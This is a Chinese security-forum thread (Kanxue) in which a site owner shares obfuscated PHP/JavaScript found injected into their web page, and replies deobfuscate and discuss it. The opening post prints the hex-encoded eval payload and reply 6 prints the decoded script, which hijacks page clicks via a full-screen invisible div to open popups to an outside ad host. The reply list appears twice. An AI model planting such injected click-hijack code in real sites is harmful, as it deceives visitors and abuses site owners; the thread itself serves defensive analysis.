[原创]网页上被加了恶意代码，找了好久才发现，分享出来大家借鉴-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[原创]网页上被加了恶意代码，找了好久才发现，分享出来大家借鉴

发表于: 2015-11-28 19:07 10051

[原创]网页上被加了恶意代码，找了好久才发现，分享出来大家借鉴

pedisbest

2015-11-28 19:07

10051

function Class_UC_key($string){$array = strlen ($string);$debuger = '';for($one = 0;$one < $array;$one+=2) {$debuger .= pack ("C",hexdec (substr ($string,$one,2)));}return $debuger;}
             echo(Class_UC_key('6576616c2866756e6374696f6e28702c612c632c6b2c652c72297b653d66756e6374696f6e2863297b72657475726e28633c613f27273a65287061727365496e7428632f612929292b2828633d632561293e33353f537472696e672e66726f6d43686172436f646528632b3239293a632e746f537472696e6728333629297d3b6966282127272e7265706c616365282f5e2f2c537472696e6729297b7768696c6528632d2d29725b652863295d3d6b5b635d7c7c652863293b6b3d5b66756e6374696f6e2865297b72657475726e20725b655d7d5d3b653d66756e6374696f6e28297b72657475726e275c5c772b277d3b633d317d3b7768696c6528632d2d296966286b5b635d29703d702e7265706c616365286e65772052656745787028275c5c62272b652863292b275c5c62272c276727292c6b5b635d293b72657475726e20707d28273320393d5c2731303a2f2f742e752e792f443f483d5c273b37206a2861297b3320623d22223b3320633d612b223d223b3528322e342e683e30297b363d322e342e382863293b352836213d2d31297b362b3d632e683b653d322e342e3828223b222c36293b3528653d3d2d3129653d322e342e683b623d4b28322e342e4c28362c6529297d7d5020627d37206b28612c622c63297b3320643d22223b352863213d73297b643d6c206928286c20692829292e7628292b632a78293b643d223b2031313d222b642e4128297d322e343d612b223d222b422862292b642b223b433d2f227d3720672861297b3320613d612b4528322e46293b3320623d303b3320633d5c27475c273b3528216a28632926262162297b662e492861293b662e4a28293b623d313b6b28632c312c3132297d7d283728642c772c72297b3528286d2e6e2e38285c274d5c27293e3d30292626286d2e6e2e38285c274e5c27293c3029297b642e4f285c273c6f20513d22523a2070253b543a2070253b7a2d553a20563b573a20303b583a20303b593a205a3b2220713d22672839293b223e3c2f6f3e5c27297d537b642e713d3728297b672839297d7d7d2928322c662c39293b272c36322c36352c277c7c646f63756d656e747c7661727c636f6f6b69657c69667c6f66667365747c66756e6374696f6e7c696e6465784f667c6a757374666f7266756e7c7c7c7c7c656e647c77696e646f777c706f704f70656e7c6c656e6774687c446174657c636f6f6b69654765747c636f6f6b69655365747c6e65777c6e6176696761746f727c757365724167656e747c6469767c3130307c6f6e636c69636b7c7c6e756c6c7c6170697c6b756169387c67657454696d657c7c333630303030307c636f6d7c7c746f474d54537472696e677c6573636170657c706174687c6a756d707c656e636f6465555249436f6d706f6e656e747c7469746c657c506f705f6d616d617c77647c6f70656e7c666f6375737c756e6573636170657c737562737472696e677c4d5349457c4f706572617c77726974656c6e7c72657475726e7c7374796c657c6865696768747c656c73657c77696474687c696e6465787c3130303030307c746f707c6c6566747c706f736974696f6e7c66697865647c687474707c657870697265737c272e73706c697428277c27292c302c7b7d2929'));
             exit();

登录后可查看完整内容

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・23

免费・0

支持

最新回复 (22)
kanxue 雪币： 47147 活跃值： (20490) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17046 粉丝 541 关注私信	kanxue 8 2 楼搞个WAF防火墙或找些现成程序，监控文件内容是不是有变化，即时报警。关键还是要把漏洞堵住。 2015-11-28 21:59 0
zjjhszs 雪币： 6 活跃值： (1509) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 308 粉丝 0 关注私信	zjjhszs 3 楼一直都有这种广告性的代码，唉，杀不绝的，360，SOHO拼音，百度下载工具，独有这些流氓特性 2015-11-28 22:32 0
Rprop 雪币： 878 活跃值： (496) 能力值： ( LV3，RANK：20 ) 在线值：发帖 35 回帖 743 粉丝 12 关注私信	Rprop 4 楼注意定期对比checksum 2015-11-29 10:44 0
sxpp 雪币： 231 活跃值： (2631) 能力值： ( LV5，RANK：60 ) 在线值：发帖 11 回帖 343 粉丝 4 关注私信	sxpp 1 5 楼好像我电脑也是会自动跳转到这些广告页面，我目前没找到他怎么劫持的 2015-11-29 17:52 0
白玉箫雪币： 351 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 197 粉丝 0 关注私信	白玉箫 6 楼解密后结果如下： var justforfun='http://api.kuai8.com/jump?wd=';function cookieGet(a){var b="";var c=a+"=";if(document.cookie.length>0){offset=document.cookie.indexOf(c);if(offset!=-1){offset+=c.length;end=document.cookie.indexOf(";",offset);if(end==-1)end=document.cookie.length;b=unescape(document.cookie.substring(offset,end))}}return b}function cookieSet(a,b,c){var d="";if(c!=null){d=new Date((new Date()).getTime()+c*3600000);d="; expires="+d.toGMTString()}document.cookie=a+"="+escape(b)+d+";path=/"}function popOpen(a){var a=a+encodeURIComponent(document.title);var b=0;var c='Pop_mama';if(!cookieGet(c)&&!b){window.open(a);window.focus();b=1;cookieSet(c,1,12)}}(function(d,w,r){if((navigator.userAgent.indexOf('MSIE')>=0)&&(navigator.userAgent.indexOf('Opera')<0)){d.writeln('<div style="height: 100%;width: 100%;z-index: 100000;top: 0;left: 0;position: fixed;" onclick="popOpen(justforfun);"></div>')}else{d.onclick=function(){popOpen(justforfun)}}})(document,window,justforfun); 2015-11-30 06:43 0
alpse 雪币： 30 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	alpse 7 楼 LZ好厉害, 这种函数嵌套的伪加密代码最不容易发现了 2015-12-1 20:41 0
Hnily 雪币： 24 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 13 粉丝 0 关注私信	Hnily 8 楼还是楼主细心和有耐心，这样都被你找出来 2015-12-2 07:16 0
jobedward 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 11 粉丝 2 关注私信	jobedward 9 楼定期维护很重要，学习一下 2015-12-2 10:21 0
思念Fly 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 15 粉丝 0 关注私信	思念Fly 10 楼百度kuai8是一个游戏盒子的，并不像是黑客入侵的啊。而且他这段javascript写的真有水准，除了后面几个参数之外，其他的都看不懂，晕倒！ 2015-12-4 17:14 0
wwwyingyan 雪币： 8 活跃值： (103) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 64 粉丝 1 关注私信	wwwyingyan 11 楼看雪哥说的对，关键是要把漏洞堵住，其实WAF是拦截不了这种JS调用的，这个被感染的JS文件，并不能说明网站被人黑掉什么的，其实，很多ISP服务商都会做这样的事情，DNS污染，推广，至于原因嘛，你懂的，不能说太直白 2015-12-8 14:37 0
jackqk 雪币： 25 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 15 粉丝 0 关注私信	jackqk 12 楼楼主厉害的！ 2016-3-30 23:22 0
haaker 雪币： 220 活跃值： (59) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 17 粉丝 0 关注私信	haaker 13 楼这广告代码做的太花心思了。 2016-3-31 23:20 0
vvkingc 雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 12 粉丝 0 关注私信	vvkingc 14 楼定期跳转到不同的网页是怎么实现的？如果先跳转到一个固定网页之后再做跳转会不会更容易一点，难道是网页有后门，每次批量改的吗？ 2016-4-5 20:44 0
shayi 雪币： 1604 活跃值： (640) 能力值： ( LV13，RANK：460 ) 在线值：发帖 23 回帖 269 粉丝 52 关注私信	shayi 9 15 楼这2段经模糊处理和编码后的代码，看上去不像是人工编写的，一定是通过某些 php 和 js 代码混淆工具，通过程序员的明文输入，输出密文，尤其是第一段中传给 Class_UC_key() 的参数，看起来像是SHA512 加密的，我就不信他手工写得出来；第一段 php 作为第二段恶意 js 攻击载荷的释放器；通过 6 楼给出的 js 反模糊结果可以看出，它会在页面动态生成一个 div ，一旦触发了该 div 的点击事件，则新开一个浏览器窗口（window.open()），窗口地址栏的 URL 就是变量 justforfun 的值：api.kuai8.com 除此之外，它还会通过 document.cookie 新增一个 cookie ，并设置过期时间为当前时间算起的 40天以后（360万秒）从它跳转到商业广告性质的页面来看，不排除是负责 LZ 网站运维的主机托管商那里有内鬼/员工修改了你的正常 php 文件导致的（变量 justforfun=开玩笑，动机应该不是恶意入侵）比较好奇的是6楼使用的反模糊工具。。。。 2016-4-22 11:02 0
zjacai 雪币： 199 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 44 粉丝 2 关注私信	zjacai 16 楼关键在于补洞，一旦被攻入，就很难完全清理干净了 2016-5-20 22:36 0
走在冷风中雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	走在冷风中 17 楼学习一下 2016-8-22 15:06 0
那些记忆雪币： 54 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 7 粉丝 0 关注私信	那些记忆 18 楼 shayi 这2段经模糊处理和编码后的代码，看上去不像是人工编写的，一定是通过某些 php 和 js 代码混淆工具，通过程序员的明文输入，输出密文，尤其是第一段中传给 Class_UC_key() 的参数，看起来 ... 15楼可能是想知道6楼怎么得来的结果。很简单，把看不懂那段Javascript放到调试器中 eval( function(){ ......此处省略..... return p//在这里下断点，然后这个p就是明文Javascript。 } (...此处省略...) )； 2017-3-21 12:20 0
白玉箫雪币： 351 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 197 粉丝 0 关注私信	白玉箫 19 楼那些记忆 shayi 这2段经模糊处理和编码后的代码，看上去不像是人工编写的，一定是通过某些 php 和 js 代码混淆工具，通过程序员的明文输入，输 ... 没那么复杂直接把eval换成alert 2017-4-7 19:12 0
ronle 雪币： 225 活跃值： (118) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 56 粉丝 0 关注私信	ronle 20 楼除开eval，然后document.write(加密的代码)，浏览器运行也是源码 2017-4-20 14:11 0
修行的浪人雪币： 6 能力值： (RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	修行的浪人 21 楼有实力的请联系我看个签 2017-8-3 14:31 0
petersonhz 雪币： 2375 活跃值： (433) 能力值： ( LV2，RANK：10 ) 在线值：发帖 422 回帖 2433 粉丝 1 关注私信	petersonhz 23 楼 kanxue 搞个WAF防火墙或找些现成程序，监控文件内容是不是有变化，即时报警。关键还是要把漏洞堵住。 WAF防火墙用哪种比较好？ 2018-4-7 19:17 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

pedisbest

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (22)
kanxue 雪币： 47147 活跃值： (20490) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17046 粉丝 541 关注私信	kanxue 8 2 楼搞个WAF防火墙或找些现成程序，监控文件内容是不是有变化，即时报警。关键还是要把漏洞堵住。 2015-11-28 21:59 0
zjjhszs 雪币： 6 活跃值： (1509) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 308 粉丝 0 关注私信	zjjhszs 3 楼一直都有这种广告性的代码，唉，杀不绝的，360，SOHO拼音，百度下载工具，独有这些流氓特性 2015-11-28 22:32 0
Rprop 雪币： 878 活跃值： (496) 能力值： ( LV3，RANK：20 ) 在线值：发帖 35 回帖 743 粉丝 12 关注私信	Rprop 4 楼注意定期对比checksum 2015-11-29 10:44 0
sxpp 雪币： 231 活跃值： (2631) 能力值： ( LV5，RANK：60 ) 在线值：发帖 11 回帖 343 粉丝 4 关注私信	sxpp 1 5 楼好像我电脑也是会自动跳转到这些广告页面，我目前没找到他怎么劫持的 2015-11-29 17:52 0
白玉箫雪币： 351 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 197 粉丝 0 关注私信	白玉箫 6 楼解密后结果如下： var justforfun='http://api.kuai8.com/jump?wd=';function cookieGet(a){var b="";var c=a+"=";if(document.cookie.length>0){offset=document.cookie.indexOf(c);if(offset!=-1){offset+=c.length;end=document.cookie.indexOf(";",offset);if(end==-1)end=document.cookie.length;b=unescape(document.cookie.substring(offset,end))}}return b}function cookieSet(a,b,c){var d="";if(c!=null){d=new Date((new Date()).getTime()+c*3600000);d="; expires="+d.toGMTString()}document.cookie=a+"="+escape(b)+d+";path=/"}function popOpen(a){var a=a+encodeURIComponent(document.title);var b=0;var c='Pop_mama';if(!cookieGet(c)&&!b){window.open(a);window.focus();b=1;cookieSet(c,1,12)}}(function(d,w,r){if((navigator.userAgent.indexOf('MSIE')>=0)&&(navigator.userAgent.indexOf('Opera')<0)){d.writeln('<div style="height: 100%;width: 100%;z-index: 100000;top: 0;left: 0;position: fixed;" onclick="popOpen(justforfun);"></div>')}else{d.onclick=function(){popOpen(justforfun)}}})(document,window,justforfun); 2015-11-30 06:43 0
alpse 雪币： 30 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	alpse 7 楼 LZ好厉害, 这种函数嵌套的伪加密代码最不容易发现了 2015-12-1 20:41 0
Hnily 雪币： 24 活跃值： (30) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 13 粉丝 0 关注私信	Hnily 8 楼还是楼主细心和有耐心，这样都被你找出来 2015-12-2 07:16 0
jobedward 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 11 粉丝 2 关注私信	jobedward 9 楼定期维护很重要，学习一下 2015-12-2 10:21 0
思念Fly 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 15 粉丝 0 关注私信	思念Fly 10 楼百度kuai8是一个游戏盒子的，并不像是黑客入侵的啊。而且他这段javascript写的真有水准，除了后面几个参数之外，其他的都看不懂，晕倒！ 2015-12-4 17:14 0
wwwyingyan 雪币： 8 活跃值： (103) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 64 粉丝 1 关注私信	wwwyingyan 11 楼看雪哥说的对，关键是要把漏洞堵住，其实WAF是拦截不了这种JS调用的，这个被感染的JS文件，并不能说明网站被人黑掉什么的，其实，很多ISP服务商都会做这样的事情，DNS污染，推广，至于原因嘛，你懂的，不能说太直白 2015-12-8 14:37 0
jackqk 雪币： 25 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 15 粉丝 0 关注私信	jackqk 12 楼楼主厉害的！ 2016-3-30 23:22 0
haaker 雪币： 220 活跃值： (59) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 17 粉丝 0 关注私信	haaker 13 楼这广告代码做的太花心思了。 2016-3-31 23:20 0
vvkingc 雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 12 粉丝 0 关注私信	vvkingc 14 楼定期跳转到不同的网页是怎么实现的？如果先跳转到一个固定网页之后再做跳转会不会更容易一点，难道是网页有后门，每次批量改的吗？ 2016-4-5 20:44 0
shayi 雪币： 1604 活跃值： (640) 能力值： ( LV13，RANK：460 ) 在线值：发帖 23 回帖 269 粉丝 52 关注私信	shayi 9 15 楼这2段经模糊处理和编码后的代码，看上去不像是人工编写的，一定是通过某些 php 和 js 代码混淆工具，通过程序员的明文输入，输出密文，尤其是第一段中传给 Class_UC_key() 的参数，看起来像是SHA512 加密的，我就不信他手工写得出来；第一段 php 作为第二段恶意 js 攻击载荷的释放器；通过 6 楼给出的 js 反模糊结果可以看出，它会在页面动态生成一个 div ，一旦触发了该 div 的点击事件，则新开一个浏览器窗口（window.open()），窗口地址栏的 URL 就是变量 justforfun 的值：api.kuai8.com 除此之外，它还会通过 document.cookie 新增一个 cookie ，并设置过期时间为当前时间算起的 40天以后（360万秒）从它跳转到商业广告性质的页面来看，不排除是负责 LZ 网站运维的主机托管商那里有内鬼/员工修改了你的正常 php 文件导致的（变量 justforfun=开玩笑，动机应该不是恶意入侵）比较好奇的是6楼使用的反模糊工具。。。。 2016-4-22 11:02 0
zjacai 雪币： 199 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 44 粉丝 2 关注私信	zjacai 16 楼关键在于补洞，一旦被攻入，就很难完全清理干净了 2016-5-20 22:36 0
走在冷风中雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	走在冷风中 17 楼学习一下 2016-8-22 15:06 0
那些记忆雪币： 54 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 7 粉丝 0 关注私信	那些记忆 18 楼 shayi 这2段经模糊处理和编码后的代码，看上去不像是人工编写的，一定是通过某些 php 和 js 代码混淆工具，通过程序员的明文输入，输出密文，尤其是第一段中传给 Class_UC_key() 的参数，看起来 ... 15楼可能是想知道6楼怎么得来的结果。很简单，把看不懂那段Javascript放到调试器中 eval( function(){ ......此处省略..... return p//在这里下断点，然后这个p就是明文Javascript。 } (...此处省略...) )； 2017-3-21 12:20 0
白玉箫雪币： 351 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 197 粉丝 0 关注私信	白玉箫 19 楼那些记忆 shayi 这2段经模糊处理和编码后的代码，看上去不像是人工编写的，一定是通过某些 php 和 js 代码混淆工具，通过程序员的明文输入，输 ... 没那么复杂直接把eval换成alert 2017-4-7 19:12 0
ronle 雪币： 225 活跃值： (118) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 56 粉丝 0 关注私信	ronle 20 楼除开eval，然后document.write(加密的代码)，浏览器运行也是源码 2017-4-20 14:11 0
修行的浪人雪币： 6 能力值： (RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	修行的浪人 21 楼有实力的请联系我看个签 2017-8-3 14:31 0
petersonhz 雪币： 2375 活跃值： (433) 能力值： ( LV2，RANK：10 ) 在线值：发帖 422 回帖 2433 粉丝 1 关注私信	petersonhz 23 楼 kanxue 搞个WAF防火墙或找些现成程序，监控文件内容是不是有变化，即时报警。关键还是要把漏洞堵住。 WAF防火墙用哪种比较好？ 2018-4-7 19:17 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复